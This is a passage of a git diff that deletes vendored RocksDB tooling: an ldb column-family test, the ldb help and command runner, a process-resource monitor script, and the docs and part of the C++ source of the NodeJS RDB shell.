-                             isPattern=True)
-
-    def testListColumnFamilies(self):
-        print "Running testListColumnFamilies..."
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put x1 y1 --create_if_missing", "OK")
-        cmd = "list_column_families %s | grep -v \"Column families\""
-        # Test on valid dbPath.
-        self.assertRunOKFull(cmd % dbPath, "{default}")
-        # Test on empty path.
-        self.assertRunFAILFull(cmd % "")
-
-    def testColumnFamilies(self):
-        print "Running testColumnFamilies..."
-        dbPath = os.path.join(self.TMP_DIR, self.DB_NAME)
-        self.assertRunOK("put cf1_1 1 --create_if_missing", "OK")
-        self.assertRunOK("put cf1_2 2 --create_if_missing", "OK")
-        self.assertRunOK("put cf1_3 3 --try_load_options", "OK")
-        # Given non-default column family to single CF DB.
-        self.assertRunFAIL("get cf1_1 --column_family=two")
-        self.assertRunOK("create_column_family two", "OK")
-        self.assertRunOK("put cf2_1 1 --create_if_missing --column_family=two",
-                         "OK")
-        self.assertRunOK("put cf2_2 2 --create_if_missing --column_family=two",
-                         "OK")
-        self.assertRunOK("delete cf1_2", "OK")
-        self.assertRunOK("create_column_family three", "OK")
-        self.assertRunOK("delete cf2_2 --column_family=two", "OK")
-        self.assertRunOK(
-            "put cf3_1 3 --create_if_missing --column_family=three",
-            "OK")
-        self.assertRunOK("get cf1_1 --column_family=default", "1")
-        self.assertRunOK("dump --column_family=two",
-                         "cf2_1 ==> 1\nKeys in range: 1")
-        self.assertRunOK("dump --column_family=two --try_load_options",
-                         "cf2_1 ==> 1\nKeys in range: 1")
-        self.assertRunOK("dump",
-                         "cf1_1 ==> 1\ncf1_3 ==> 3\nKeys in range: 2")
-        self.assertRunOK("get cf2_1 --column_family=two",
-                         "1")
-        self.assertRunOK("get cf3_1 --column_family=three",
-                         "3")
-        # non-existing column family.
-        self.assertRunFAIL("get cf3_1 --column_family=four")
-
-if __name__ == "__main__":
-    unittest.main()
diff --git a/thirdparty/rocksdb/tools/ldb_tool.cc b/thirdparty/rocksdb/tools/ldb_tool.cc
deleted file mode 100644
index e8229ef..0000000
--- a/thirdparty/rocksdb/tools/ldb_tool.cc
+++ /dev/null
@@ -1,131 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-#include "rocksdb/ldb_tool.h"
-#include "rocksdb/utilities/ldb_cmd.h"
-#include "tools/ldb_cmd_impl.h"
-
-namespace rocksdb {
-
-LDBOptions::LDBOptions() {}
-
-void LDBCommandRunner::PrintHelp(const LDBOptions& ldb_options,
-                                 const char* exec_name) {
-  std::string ret;
-
-  ret.append(ldb_options.print_help_header);
-  ret.append("\n\n");
-  ret.append("commands MUST specify --" + LDBCommand::ARG_DB +
-             "=<full_path_to_db_directory> when necessary\n");
-  ret.append("\n");
-  ret.append(
-      "The following optional parameters control if keys/values are "
-      "input/output as hex or as plain strings:\n");
-  ret.append("  --" + LDBCommand::ARG_KEY_HEX +
-             " : Keys are input/output as hex\n");
-  ret.append("  --" + LDBCommand::ARG_VALUE_HEX +
-             " : Values are input/output as hex\n");
-  ret.append("  --" + LDBCommand::ARG_HEX +
-             " : Both keys and values are input/output as hex\n");
-  ret.append("\n");
-
-  ret.append(
-      "The following optional parameters control the database "
-      "internals:\n");
-  ret.append(
-      "  --" + LDBCommand::ARG_CF_NAME +
-      "=<string> : name of the column family to operate on. default: default "
-      "column family\n");
-  ret.append("  --" + LDBCommand::ARG_TTL +
-             " with 'put','get','scan','dump','query','batchput'"
-             " : DB supports ttl and value is internally timestamp-suffixed\n");
-  ret.append("  --" + LDBCommand::ARG_TRY_LOAD_OPTIONS +
-             " : Try to load option file from DB.\n");
-  ret.append("  --" + LDBCommand::ARG_IGNORE_UNKNOWN_OPTIONS +
-             " : Ignore unknown options when loading option file.\n");
-  ret.append("  --" + LDBCommand::ARG_BLOOM_BITS + "=<int,e.g.:14>\n");
-  ret.append("  --" + LDBCommand::ARG_FIX_PREFIX_LEN + "=<int,e.g.:14>\n");
-  ret.append("  --" + LDBCommand::ARG_COMPRESSION_TYPE +
-             "=<no|snappy|zlib|bzip2|lz4|lz4hc|xpress|zstd>\n");
-  ret.append("  --" + LDBCommand::ARG_COMPRESSION_MAX_DICT_BYTES +
-             "=<int,e.g.:16384>\n");
-  ret.append("  --" + LDBCommand::ARG_BLOCK_SIZE + "=<block_size_in_bytes>\n");
-  ret.append("  --" + LDBCommand::ARG_AUTO_COMPACTION + "=<true|false>\n");
-  ret.append("  --" + LDBCommand::ARG_DB_WRITE_BUFFER_SIZE +
-             "=<int,e.g.:16777216>\n");
-  ret.append("  --" + LDBCommand::ARG_WRITE_BUFFER_SIZE +
-             "=<int,e.g.:4194304>\n");
-  ret.append("  --" + LDBCommand::ARG_FILE_SIZE + "=<int,e.g.:2097152>\n");
-
-  ret.append("\n\n");
-  ret.append("Data Access Commands:\n");
-  PutCommand::Help(ret);
-  GetCommand::Help(ret);
-  BatchPutCommand::Help(ret);
-  ScanCommand::Help(ret);
-  DeleteCommand::Help(ret);
-  DeleteRangeCommand::Help(ret);
-  DBQuerierCommand::Help(ret);
-  ApproxSizeCommand::Help(ret);
-  CheckConsistencyCommand::Help(ret);
-
-  ret.append("\n\n");
-  ret.append("Admin Commands:\n");
-  WALDumperCommand::Help(ret);
-  CompactorCommand::Help(ret);
-  ReduceDBLevelsCommand::Help(ret);
-  ChangeCompactionStyleCommand::Help(ret);
-  DBDumperCommand::Help(ret);
-  DBLoaderCommand::Help(ret);
-  ManifestDumpCommand::Help(ret);
-  ListColumnFamiliesCommand::Help(ret);
-  DBFileDumperCommand::Help(ret);
-  InternalDumpCommand::Help(ret);
-  RepairCommand::Help(ret);
-  BackupCommand::Help(ret);
-  RestoreCommand::Help(ret);
-  CheckPointCommand::Help(ret);
-
-  fprintf(stderr, "%s\n", ret.c_str());
-}
-
-void LDBCommandRunner::RunCommand(
-    int argc, char** argv, Options options, const LDBOptions& ldb_options,
-    const std::vector<ColumnFamilyDescriptor>* column_families) {
-  if (argc <= 2) {
-    PrintHelp(ldb_options, argv[0]);
-    exit(1);
-  }
-
-  LDBCommand* cmdObj = LDBCommand::InitFromCmdLineArgs(
-      argc, argv, options, ldb_options, column_families);
-  if (cmdObj == nullptr) {
-    fprintf(stderr, "Unknown command\n");
-    PrintHelp(ldb_options, argv[0]);
-    exit(1);
-  }
-
-  if (!cmdObj->ValidateCmdLineOptions()) {
-    exit(1);
-  }
-
-  cmdObj->Run();
-  LDBCommandExecuteResult ret = cmdObj->GetExecuteState();
-  fprintf(stderr, "%s\n", ret.ToString().c_str());
-  delete cmdObj;
-
-  exit(ret.IsFailed());
-}
-
-void LDBTool::Run(int argc, char** argv, Options options,
-                  const LDBOptions& ldb_options,
-                  const std::vector<ColumnFamilyDescriptor>* column_families) {
-  LDBCommandRunner::RunCommand(argc, argv, options, ldb_options,
-                               column_families);
-}
-} // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/pflag b/thirdparty/rocksdb/tools/pflag
deleted file mode 100755
index f3394a6..0000000
--- a/thirdparty/rocksdb/tools/pflag
+++ /dev/null
@@ -1,217 +0,0 @@
-#!/usr/bin/env bash
-#
-#(c) 2004-present, Facebook, all rights reserved. 
-# See the LICENSE file for usage and distribution rights.
-#
-
-trap 'echo "Caught exception, dying"; exit' 1 2 3 15
-
-ME=`basename $0`
-SERVER=`hostname`
-
-#parameters used
-#
-Dump_Config=0
-DEBUG=
-OS=`/bin/uname -s`
-VMEM=
-RSS=
-CPU=
-VERBOSE=
-VAR=
-LIMIT=
-ACTION=
-N=
-WAIT=
-
-#
-#supported OS: Linux only for now. Easy to add
-#
-oscheck() {
-  case ${OS} in
-    Linux)
-     VMEM=vsz
-     RSS=rss
-     CPU=bsdtime
-     ;;
-    *)
-      die "Unsupported OS ${OS}. Send a bug report with OS you need supported. Thanks."
-      ;;
-  esac
-}
-
-
-verbose() {
-  if [ "x$DEBUG" != "x" ]; then
-    echo "$@" >&2
-  fi
-}
-
-warn() {
-  echo "$@" >&2
-}
-
-die() {
-    echo "ERROR: " "$@" >&2;
-    exit;
-}
-
-dump_config() {
-  cat <<EOCONFIG;
-$ME running on ${HOSTNAME} at `date`
-
-Configuration for this run:
-  PID to monitor     : ${PID}
-  Resource monitored : ${VAR}
-  Resource limit     : ${LIMIT}
-  Check every        : ${WAIT} seconds
-  No. of times run   : ${N}
-  What to do         : ${ACTION}
-EOCONFIG
-
-}
-
-usage() {
-  cat <<USAGE; exit
-$@
-
-Usage ${ME} -p pid [-x {VMEM|RSS|CPU}] -l limit [-a {warn|die|kill}] [-n cycles] [-w wait]
-
-Monitor a process for set of violations. Options:
-
-  -p: PID of process to monitor
-
-  -x: metric to sense. Currently only VMEM/RSS/CPU are supported. Defaults to VMEM
-
-  -l: what is the threshold/limit for the metric that is being sensed.
-    Examples: "-l 100m", "-l 1.5g" (for VMEM/RSS), "-l 5:04" 5:04 in BSDTIME for CPU
-    NOTE: defaults to 1GB
-
-  -a: action. Currently {warn|die|kill} are supported. 
-    The default action is to 'warn'. Here is the behavior:
-
-    warn: complain if usage exceeds threshold, but continue monitoring
-    kill: complain, kill the db_bench process and exit
-    die:  if usage exceeds threshold, die immediately
-
-  -n: number of cycles to monitor. Default is to monitor until PID no longer exists.
-
-  -w: wait time per cycle of monitoring. Default is 5 seconds.
-
-  -v: verbose messaging
-
-USAGE
-
-}
-
-#set default values if none given
-set_defaults_if_noopt_given() {
-
-  : ${VAR:=vsz}
-  : ${LIMIT:=1024000}
-  : ${WAIT:=5}
-  : ${N:=999999}
-  : ${ACTION:=warn}
-}
-
-validate_options() {
-  if [ "x$PID" = "x" -a $Dump_Config -ne 1 ]; then
-    usage "PID is mandatory"
-  fi
-}
-
-###### START
-
-
-  while getopts ":p:x:l:a:n:t:vhd" opt; do
-    case $opt in
-      d)
-          Dump_Config=1
-          ;;
-      h)
-          usage;
-          ;;
-      a)
-        ACTION=${OPTARG};
-        ;;
-      v)
-        DEBUG=1;
-        ;;
-      p)
-        PID=$OPTARG;
-        ;;
-      x)
-        VAR=$OPTARG;
-        ;;
-      l)
-        LIMIT=$OPTARG;
-        ;;
-      w)
-        WAIT=$OPTARG;
-        ;;
-      n)
-        N=$OPTARG;
-        ;;
-      \?) 
-        usage;
-        ;;
-    esac
-  done
-
-oscheck;
-set_defaults_if_noopt_given;
-validate_options;
-
-if [ $Dump_Config -eq 1 ]; then
-    dump_config;
-    exit;
-fi
-
-Done=0
-
-verbose "Trying ${N} times, Waiting ${WAIT} seconds each iteration";
-
-while [ $Done -eq 0 ]; do
-  VAL=`/bin/ps h -p $PID -o ${VAR} | perl -pe 'chomp; s/(.*)m/$1 * 1024/e; s/(.*)g/$1 * 1024 * 1024/e;'`
-  if [ ${VAL:=0} -eq 0 ]; then
-    warn "Process $PID ended without incident."
-    Done=1;
-    break;
-  fi
-
-  if [ $VAL -ge $LIMIT ]; then
-    Done=1;
-  else
-    echo "Value of '${VAR}' (${VAL}) is less than ${LIMIT} for PID ${PID}"
-    sleep $WAIT;
-  fi
-  if [ $Done -eq 1 ]; then
-
-    if [ "$ACTION" = "kill" ]; then
-        kill ${PID} || kill -3 ${PID}
-        exit;
-
-    elif [ "$ACTION" = "warn" ]; then
-
-      # go back to monitoring.
-
-      warn "`date` WARNING: ${VAR} breached threshold ${LIMIT}, actual is ${VAL}"
-      Done=0  #go back to monitoring
-
-    elif [ "$ACTION" = "die" ]; then
-      warn "WARNING: dying without killing process ${PID} on ${SERVER}"
-      warn "The process details are below: "
-      warn "`ps -p ${PID} -o pid,ppid,bsdtime,rss,vsz,cmd,args`"
-      warn ""
-
-      #should we send email/notify someone? TODO... for now, bail.
-
-      exit -1;
-
-    fi
-  else
-      :
-      #warn "INFO: PID $PID, $VAR = $VAL, limit ($LIMIT) not exceeded";
-  fi
-done
-
diff --git a/thirdparty/rocksdb/tools/rdb/.gitignore b/thirdparty/rocksdb/tools/rdb/.gitignore
deleted file mode 100644
index 378eac2..0000000
--- a/thirdparty/rocksdb/tools/rdb/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-build
diff --git a/thirdparty/rocksdb/tools/rdb/API.md b/thirdparty/rocksdb/tools/rdb/API.md
deleted file mode 100644
index e9c2e59..0000000
--- a/thirdparty/rocksdb/tools/rdb/API.md
+++ /dev/null
@@ -1,178 +0,0 @@
-# JavaScript API
-
-## DBWrapper
-
-### Constructor
-
-    # Creates a new database wrapper object
-    RDB()
-
-### Open
-
-    # Open a new or existing RocksDB database.
-    #
-    # db_name         (string)   - Location of the database (inside the
-    #                              `/tmp` directory).
-    # column_families (string[]) - Names of additional column families
-    #                              beyond the default. If there are no other
-    #                              column families, this argument can be
-    #                              left off.
-    #
-    # Returns true if the database was opened successfully, or false otherwise
-    db_obj.(db_name, column_families = [])
-
-### Get
-
-    # Get the value of a given key.
-    #
-    # key           (string) - Which key to get the value of.
-    # column_family (string) - Which column family to check for the key.
-    #                          This argument can be left off for the default
-    #                          column family
-    #
-    # Returns the value (string) that is associated with the given key if
-    # one exists, or null otherwise.
-    db_obj.get(key, column_family = { default })
-
-### Put
-
-    # Associate a value with a key.
-    #
-    # key           (string) - Which key to associate the value with.
-    # value         (string) - The value to associate with the key.
-    # column_family (string) - Which column family to put the key-value pair
-    #                          in. This argument can be left off for the
-    #                          default column family.
-    #
-    # Returns true if the key-value pair was successfully stored in the
-    # database, or false otherwise.
-    db_obj.put(key, value, column_family = { default })
-
-### Delete
-
-    # Delete a value associated with a given key.
-    #
-    # key           (string) - Which key to delete the value of..
-    # column_family (string) - Which column family to check for the key.
-    #                          This argument can be left off for the default
-    #                          column family
-    #
-    # Returns true if an error occurred while trying to delete the key in
-    # the database, or false otherwise. Note that this is NOT the same as
-    # whether a value was deleted; in the case of a specified key not having
-    # a value, this will still return true. Use the `get` method prior to
-    # this method to check if a value existed before the call to `delete`.
-    db_obj.delete(key, column_family = { default })
-
-### Dump
-
-    # Print out all the key-value pairs in a given column family of the
-    # database.
-    #
-    # column_family (string) - Which column family to dump the pairs from.
-    #                          This argument can be left off for the default
-    #                          column family.
-    #
-    # Returns true if the keys were successfully read from the database, or
-    # false otherwise.
-    db_obj.dump(column_family = { default })
-
-### WriteBatch
-
-    # Execute an atomic batch of writes (i.e. puts and deletes) to the
-    # database.
-    #
-    # cf_batches (BatchObject[]; see below) - Put and Delete writes grouped
-    #                                         by column family to execute
-    #                                         atomically.
-    #
-    # Returns true if the argument array was well-formed and was
-    # successfully written to the database, or false otherwise.
-    db_obj.writeBatch(cf_batches)
-
-### CreateColumnFamily
-
-    # Create a new column family for the database.
-    #
-    # column_family_name (string) - Name of the new column family.
-    #
-    # Returns true if the new column family was successfully created, or
-    # false otherwise.
-    db_obj.createColumnFamily(column_family_name)
-
-### CompactRange
-
-    # Compact the underlying storage for a given range.
-    #
-    # In addition to the endpoints of the range, the method is overloaded to
-    # accept a non-default column family, a set of options, or both.
-    #
-    # begin (string)         - First key in the range to compact.
-    # end   (string)         - Last key in the range to compact.
-    # options (object)       - Contains a subset of the following key-value
-    #                          pairs:
-    #                            * 'target_level'   => int
-    #                            * 'target_path_id' => int
-    # column_family (string) - Which column family to compact the range in.
-    db_obj.compactRange(begin, end)
-    db_obj.compactRange(begin, end, options)
-    db_obj.compactRange(begin, end, column_family)
-    db_obj.compactRange(begin, end, options, column_family)
-
-
-
-### Close
-
-    # Close an a database and free the memory associated with it.
-    #
-    # Return null.
-    # db_obj.close()
-
-
-## BatchObject
-
-### Structure
-
-A BatchObject must have at least one of the following key-value pairs:
-
-* 'put' => Array of ['string1', 'string1'] pairs, each of which signifies that
-the key 'string1' should be associated with the value 'string2'
-* 'delete' => Array of strings, each of which is a key whose value should be
-deleted.
-
-The following key-value pair is optional:
-
-* 'column_family' => The name (string) of the column family to apply the
-changes to.
-
-### Examples
-
-    # Writes the key-value pairs 'firstname' => 'Saghm' and
-    # 'lastname' => 'Rossi' atomically to the database.
-    db_obj.writeBatch([
-        {
-            put: [ ['firstname', 'Saghm'], ['lastname', 'Rossi'] ]
-        }
-    ]);
-
-
-    # Deletes the values associated with 'firstname' and 'lastname' in
-    # the default column family and adds the key 'number_of_people' with
-    # with the value '2'. Additionally, adds the key-value pair
-    # 'name' => 'Saghm Rossi' to the column family 'user1' and the pair
-    # 'name' => 'Matt Blaze' to the column family 'user2'. All writes
-    # are done atomically.
-    db_obj.writeBatch([
-        {
-            put: [ ['number_of_people', '2'] ],
-            delete: ['firstname', 'lastname']
-        },
-        {
-            put: [ ['name', 'Saghm Rossi'] ],
-            column_family: 'user1'
-        },
-        {
-            put: [ ['name', Matt Blaze'] ],
-            column_family: 'user2'
-        }
-    ]);
diff --git a/thirdparty/rocksdb/tools/rdb/README.md b/thirdparty/rocksdb/tools/rdb/README.md
deleted file mode 100644
index f69b3f7..0000000
--- a/thirdparty/rocksdb/tools/rdb/README.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# RDB - RocksDB Shell
-
-RDB is a NodeJS-based shell interface to RocksDB. It can also be used as a
-JavaScript binding for RocksDB within a Node application.
-
-## Setup/Compilation
-
-### Requirements
-
-* static RocksDB library (i.e. librocksdb.a)
-* libsnappy
-* node (tested onv0.10.33, no guarantees on anything else!)
-* node-gyp
-* python2 (for node-gyp; tested with 2.7.8)
-
-### Installation
-
-NOTE: If your default `python` binary is not a version of python2, add
-the arguments `--python /path/to/python2` to the `node-gyp` commands.
-
-1. Make sure you have the static library (i.e. "librocksdb.a") in the root
-directory of your rocksdb installation. If not, `cd` there and run
-`make static_lib`.
-
-2. Run `node-gyp configure` to generate the build.
-
-3. Run `node-gyp build` to compile RDB.
-
-## Usage
-
-### Running the shell
-
-Assuming everything compiled correctly, you can run the `rdb` executable
-located in the root of the `tools/rdb` directory to start the shell. The file is
-just a shell script that runs the node shell and loads the constructor for the
-RDB object into the top-level function `RDB`.
-
-### JavaScript API
-
-See `API.md` for how to use RocksDB from the shell.
diff --git a/thirdparty/rocksdb/tools/rdb/binding.gyp b/thirdparty/rocksdb/tools/rdb/binding.gyp
deleted file mode 100644
index 8914554..0000000
--- a/thirdparty/rocksdb/tools/rdb/binding.gyp
+++ /dev/null
@@ -1,25 +0,0 @@
-{
-    "targets": [
-        {
-            "target_name": "rdb",
-            "sources": [
-                "rdb.cc",
-                "db_wrapper.cc",
-                "db_wrapper.h"
-            ],
-            "cflags_cc!": [
-                "-fno-exceptions"
-            ],
-            "cflags_cc+": [
-                "-std=c++11",
-            ],
-            "include_dirs+": [
-                "../../include"
-            ],
-            "libraries": [
-                "../../../librocksdb.a",
-                "-lsnappy"
-            ],
-        }
-    ]
-}
diff --git a/thirdparty/rocksdb/tools/rdb/db_wrapper.cc b/thirdparty/rocksdb/tools/rdb/db_wrapper.cc
deleted file mode 100644
index 1ec9da1..0000000
--- a/thirdparty/rocksdb/tools/rdb/db_wrapper.cc
+++ /dev/null
@@ -1,525 +0,0 @@
-#include <iostream>
-#include <memory>
-#include <vector>
-#include <v8.h>
-#include <node.h>
-
-#include "db/_wrapper.h"
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-
-namespace {
-  void printWithBackSlashes(std::string str) {
-    for (std::string::size_type i = 0; i < str.size(); i++) {
-      if (str[i] == '\\' || str[i] == '"') {
-        std::cout << "\\";
-      }
-
-      std::cout << str[i];
-    }
-  }
-
-  bool has_key_for_array(Local<Object> obj, std::string key) {
-    return obj->Has(String::NewSymbol(key.c_str())) &&
-        obj->Get(String::NewSymbol(key.c_str()))->IsArray();
-  }
-}
-
-using namespace v8;
-
-
-Persistent<Function> DBWrapper::constructor;
-
-DBWrapper::DBWrapper() {
-  options_.IncreaseParallelism();
-  options_.OptimizeLevelStyleCompaction();
-  options_.disable_auto_compactions = true;
-  options_.create_if_missing = true;
-}
-
-DBWrapper::~DBWrapper() {
-  delete db_;
-}
-
-bool DBWrapper::HasFamilyNamed(std::string& name, DBWrapper* db) {
-  return db->columnFamilies_.find(name) != db->columnFamilies_.end();
-}
-
-
-void DBWrapper::Init(Handle<Object> exports) {
-  Local<FunctionTemplate> tpl = FunctionTemplate::New(New);
-  tpl->SetClassName(String::NewSymbol("DBWrapper"));
-  tpl->InstanceTemplate()->SetInternalFieldCount(8);
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("open"),
-      FunctionTemplate::New(Open)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("get"),
-      FunctionTemplate::New(Get)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("put"),
-      FunctionTemplate::New(Put)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("delete"),
-      FunctionTemplate::New(Delete)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("dump"),
-      FunctionTemplate::New(Dump)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("createColumnFamily"),
-      FunctionTemplate::New(CreateColumnFamily)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("writeBatch"),
-      FunctionTemplate::New(WriteBatch)->GetFunction());
-  tpl->PrototypeTemplate()->Set(String::NewSymbol("compactRange"),
-      FunctionTemplate::New(CompactRange)->GetFunction());
-
-  constructor = Persistent<Function>::New(tpl->GetFunction());
-  exports->Set(String::NewSymbol("DBWrapper"), constructor);
-}
-
-Handle<Value> DBWrapper::Open(const Arguments& args) {
-  HandleScope scope;
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-
-  if (!(args[0]->IsString() &&
-       (args[1]->IsUndefined() || args[1]->IsArray()))) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  std::string db_file = *v8::String::Utf8Value(args[0]->ToString());
-
-  std::vector<std::string> cfs = { rocksdb::kDefaultColumnFamilyName };
-
-  if (!args[1]->IsUndefined()) {
-    Handle<Array> array = Handle<Array>::Cast(args[1]);
-    for (uint i = 0; i < array->Length(); i++) {
-      if (!array->Get(i)->IsString()) {
-        return scope.Close(Boolean::New(false));
-      }
-
-      cfs.push_back(*v8::String::Utf8Value(array->Get(i)->ToString()));
-    }
-  }
-
-  if (cfs.size() == 1) {
-    db_wrapper->status_ = rocksdb::DB::Open(
-        db_wrapper->options_, db_file, &db_wrapper->db_);
-
-    return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-  }
-
-  std::vector<rocksdb::ColumnFamilyDescriptor> families;
-
-  for (std::vector<int>::size_type i = 0; i < cfs.size(); i++) {
-    families.push_back(rocksdb::ColumnFamilyDescriptor(
-        cfs[i], rocksdb::ColumnFamilyOptions()));
-  }
-
-  std::vector<rocksdb::ColumnFamilyHandle*> handles;
-  db_wrapper->status_ = rocksdb::DB::Open(
-      db_wrapper->options_, db_file, families, &handles, &db_wrapper->db_);
-
-  if (!db_wrapper->status_.ok()) {
-    return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-  }
-
-  for (std::vector<int>::size_type i = 0; i < handles.size(); i++) {
-    db_wrapper->columnFamilies_[cfs[i]] = handles[i];
-  }
-
-  return scope.Close(Boolean::New(true));
-}
-
-
-Handle<Value> DBWrapper::New(const Arguments& args) {
-  HandleScope scope;
-  Handle<Value> to_return;
-
-  if (args.IsConstructCall()) {
-    DBWrapper* db_wrapper = new DBWrapper();
-    db_wrapper->Wrap(args.This());
-
-    return args.This();
-  }
-
-  const int argc = 0;
-  Local<Value> argv[0] = {};
-
-  return scope.Close(constructor->NewInstance(argc, argv));
-}
-
-Handle<Value> DBWrapper::Get(const Arguments& args) {
-  HandleScope scope;
-
-  if (!(args[0]->IsString() &&
-        (args[1]->IsUndefined() || args[1]->IsString()))) {
-    return scope.Close(Null());
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string key       = *v8::String::Utf8Value(args[0]->ToString());
-  std::string cf        = *v8::String::Utf8Value(args[1]->ToString());
-  std::string value;
-
-  if (args[1]->IsUndefined()) {
-    db_wrapper->status_ = db_wrapper->db_->Get(
-        rocksdb::ReadOptions(), key, &value);
-  } else if (db_wrapper->HasFamilyNamed(cf, db_wrapper)) {
-    db_wrapper->status_ = db_wrapper->db_->Get(
-        rocksdb::ReadOptions(), db_wrapper->columnFamilies_[cf], key, &value);
-  } else {
-    return scope.Close(Null());
-  }
-
-  Handle<Value> v = db_wrapper->status_.ok() ?
-      String::NewSymbol(value.c_str()) : Null();
-
-  return scope.Close(v);
-}
-
-Handle<Value> DBWrapper::Put(const Arguments& args) {
-  HandleScope scope;
-
-  if (!(args[0]->IsString() && args[1]->IsString() &&
-       (args[2]->IsUndefined() || args[2]->IsString()))) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string key       = *v8::String::Utf8Value(args[0]->ToString());
-  std::string value     = *v8::String::Utf8Value(args[1]->ToString());
-  std::string cf        = *v8::String::Utf8Value(args[2]->ToString());
-
-  if (args[2]->IsUndefined()) {
-    db_wrapper->status_  = db_wrapper->db_->Put(
-      rocksdb::WriteOptions(), key, value
-    );
-  } else if (db_wrapper->HasFamilyNamed(cf, db_wrapper)) {
-    db_wrapper->status_ = db_wrapper->db_->Put(
-      rocksdb::WriteOptions(),
-      db_wrapper->columnFamilies_[cf],
-      key,
-      value
-    );
-  } else {
-    return scope.Close(Boolean::New(false));
-  }
-
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::Delete(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[0]->IsString()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string arg0      = *v8::String::Utf8Value(args[0]->ToString());
-  std::string arg1      = *v8::String::Utf8Value(args[1]->ToString());
-
-  if (args[1]->IsUndefined()) {
-    db_wrapper->status_ = db_wrapper->db_->Delete(
-        rocksdb::WriteOptions(), arg0);
-  } else {
-    if (!db_wrapper->HasFamilyNamed(arg1, db_wrapper)) {
-      return scope.Close(Boolean::New(false));
-    }
-    db_wrapper->status_ = db_wrapper->db_->Delete(
-        rocksdb::WriteOptions(), db_wrapper->columnFamilies_[arg1], arg0);
-  }
-
-  return scope.Close(Boolean::New(db_wrapper->status_.ok()));
-}
-
-Handle<Value> DBWrapper::Dump(const Arguments& args) {
-  HandleScope scope;
-  std::unique_ptr<rocksdb::Iterator> iterator;
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string arg0      = *v8::String::Utf8Value(args[0]->ToString());
-
-  if (args[0]->IsUndefined()) {
-    iterator.reset(db_wrapper->db_->NewIterator(rocksdb::ReadOptions()));
-  } else {
-    if (!db_wrapper->HasFamilyNamed(arg0, db_wrapper)) {
-      return scope.Close(Boolean::New(false));
-    }
-
-    iterator.reset(db_wrapper->db_->NewIterator(
-        rocksdb::ReadOptions(), db_wrapper->columnFamilies_[arg0]));
-  }
-
-  iterator->SeekToFirst();
-
-  while (iterator->Valid()) {
-    std::cout << "\"";
-    printWithBackSlashes(iterator->key().ToString());
-    std::cout << "\" => \"";
-    printWithBackSlashes(iterator->value().ToString());
-    std::cout << "\"\n";
-    iterator->Next();
-  }
-
-  return scope.Close(Boolean::New(true));
-}
-
-Handle<Value> DBWrapper::CreateColumnFamily(const Arguments& args) {
-  HandleScope scope;
-
-  if (!args[0]->IsString()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  DBWrapper* db_wrapper = ObjectWrap::Unwrap<DBWrapper>(args.This());
-  std::string cf_name   = *v8::String::Utf8Value(args[0]->ToString());
-
-  if (db_wrapper->HasFamilyNamed(cf_name, db_wrapper)) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  rocksdb::ColumnFamilyHandle* cf;
-  db_wrapper->status_ = db_wrapper->db_->CreateColumnFamily(
-      rocksdb::ColumnFamilyOptions(), cf_name, &cf);
-
-  if (!db_wrapper->status_.ok()) {
-    return scope.Close(Boolean::New(false));
-  }
-
-  db_wrapper->columnFamilies_[cf_name] = cf;
-
-  return scope.Close(Boolean::New(true));
-}
-
-bool DBWrapper::AddToBatch(rocksdb::WriteBatch& batch, bool del,
-                           Handle<Array> array) {
-  Handle<Array> put_pair;
-  for (uint i = 0; i < array->Length(); i++) {
-    if (del) {
-      if (!array->Get(i)->IsString()) {
-        return false;
-      }
-
-      batch.Delete(*v8::String::Utf8Value(array->Get(i)->ToString()));
-      continue;
-    }
-
-    if (!array->Get(i)->IsArray()) {
-      return false;
-    }
-
-    put_pair = Handle<Array>::Cast(array->Get(i));
-
-    if (!put_pair->Get(0)->IsString() || !put_pair->Get(1)->IsString()) {
-      return false;
-    }
-
-    batch.Put(
-        *v8::String::Utf8Value(put_pair->Get(0)->ToString()),
-        *v8::String::Utf8Value(put_pair->Get(1)->ToString()));
-  }
-
-  return true;
-}
-
-bool DBWrapper::AddToBatch(rocksdb::WriteBatch& batch, bool del,
-                           Handle<Array> array, DBWrapper* db_wrapper,
-                           std::string cf) {
-  Handle<Array> put_pair;
-  for (uint i = 0; i < array->Length(); i++) {
-    if (del) {
-      if (!array->Get(i)->IsString()) {
-        return false;
-      }
-
-      batch.Delete(
-          db_wrapper->columnFamilies_[cf],
-          *v8::String::Utf8Value(array->Get(i)->ToString()));
-      continue;
-    }
-
-    if (!array->Get(i)->IsArray()) {
-      return false;
-    }
-
-    put_pair = Handle<Array>::Cast(array->Get(i));
-
